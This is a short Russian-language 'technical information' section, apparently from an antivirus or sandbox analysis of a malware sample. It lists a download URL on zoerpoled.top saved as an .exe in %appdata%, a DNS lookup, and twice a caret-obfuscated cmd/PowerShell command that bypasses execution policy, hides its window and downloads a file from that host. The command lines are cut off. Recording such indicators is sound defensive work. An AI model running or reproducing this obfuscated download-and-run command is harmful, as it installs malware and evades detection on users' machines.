Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^owErsHell.Ex^e -Ex^e^CU^TIOnpOl^iC^Y By^pASs ^-^NO^P^RoFILe ^-WiN^do^ws^Ty^l^e hI^D^DeN (^nEW^-oBj^ECt^ sY^S^TeM.nEt^.w^ebCL^ie^NT).D^ow^N^l^OAD^fi^Le('http://www.zoerpoled.top...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "P^owErsHell.Ex^e -Ex^e^CU^TIOnpOl^iC^Y By^pASs ^-^NO^P^RoFILe ^-WiN^do^ws^Ty^l^e hI^D^DeN (^nEW^-oBj^ECt^ sY^S^TeM.nEt^.w^ebCL^ie^NT).D^ow^N^l^OAD^fi^Le('http://www.zoerpoled.top...' (со скрытым окном)